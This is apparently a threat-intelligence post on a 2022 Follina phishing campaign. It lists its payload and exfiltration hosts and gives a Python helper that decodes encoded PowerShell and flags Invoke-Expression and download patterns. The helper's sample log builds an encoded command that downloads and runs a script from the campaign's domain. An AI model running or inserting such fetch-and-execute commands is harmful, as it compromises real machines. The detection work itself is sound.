Follina: suspected state-aligned phishing campaign

June 13, 2022

This campaign masqueraded as a salary increase and used an RTF document whose exploit payload was downloaded from 45.76.53[.]253. The downloaded PowerShell script was base64 encoded and used Invoke-Expression to fetch an additional PowerShell script from seller-notification[.]live. That second script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine reconnaissance, and then zips the results for exfiltration to 45.77.156[.]179.
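The first stage described above, a base64-encoded PowerShell command line that calls Invoke-Expression on a downloaded script, is something process-creation telemetry (Sysmon Event ID 1 or Windows 4688 with command-line auditing) records verbatim. The following triage helper is an added example, not code from the original post: it decodes an `-EncodedCommand` argument the way PowerShell does (base64 wrapping UTF-16LE text), then flags Invoke-Expression, download primitives and the three indicators quoted in the post. The two sample command lines are constructed for the example; the `stage2.ps1` file name and the `_encoded` helper are assumptions, not artefacts from the campaign.

```python
import base64
import re

# Indicators quoted in the post above, kept defanged as written there.
FOLLINA_IOCS = (
    "45.76.53[.]253",              # host of the RTF exploit payload
    "seller-notification[.]live",  # host of the second-stage PowerShell script
    "45.77.156[.]179",             # exfiltration destination
)

# PowerShell's -EncodedCommand switch (and the abbreviations it accepts) followed by base64.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biwr\b",
                      re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or undecodable.
    PowerShell expects the base64 to wrap UTF-16LE text, so that is what is decoded here."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_command_line(cmdline):
    """Return a list of finding tags for one process command line (empty if nothing matched)."""
    findings = []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded_command")
        text = cmdline + "\n" + decoded  # match on both the raw line and the decoded payload
    if IEX.search(text):
        findings.append("invoke_expression")
    if DOWNLOAD.search(text):
        findings.append("web_download")
    for ioc in FOLLINA_IOCS:
        # Indicators may appear defanged (as in reports) or live (as in telemetry).
        if ioc in text or ioc.replace("[.]", ".") in text:
            findings.append("ioc:" + ioc)
    return findings


def scan_log(lines):
    """Run analyse_command_line over a list of command lines; return (index, findings) per hit."""
    hits = []
    for i, line in enumerate(lines):
        findings = analyse_command_line(line)
        if findings:
            hits.append((i, findings))
    return hits


def _encoded(ps):
    # Assumed helper, used only to build the constructed sample below with PowerShell's encoding.
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not real telemetry). The second mimics the stage-1
# behaviour in the post: base64 wrapper, Invoke-Expression, download from the named domain.
SAMPLE_LOG = [
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Get-Process | Out-Null"',
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + _encoded("IEX (New-Object Net.WebClient).DownloadString("
               "'http://seller-notification.live/stage2.ps1')"),
]

if __name__ == "__main__":
    for idx, findings in scan_log(SAMPLE_LOG):
        print(idx, findings)
```

The benign first line shows why the encoded-command regex insists on whitespace after the switch: `-ExecutionPolicy Bypass` starts with `-E` but is not an encoded command, and `Bypass` is far too short to be mistaken for base64. In production the decoded text, not just the tags, should be kept with the alert so an analyst can see what the wrapper actually ran.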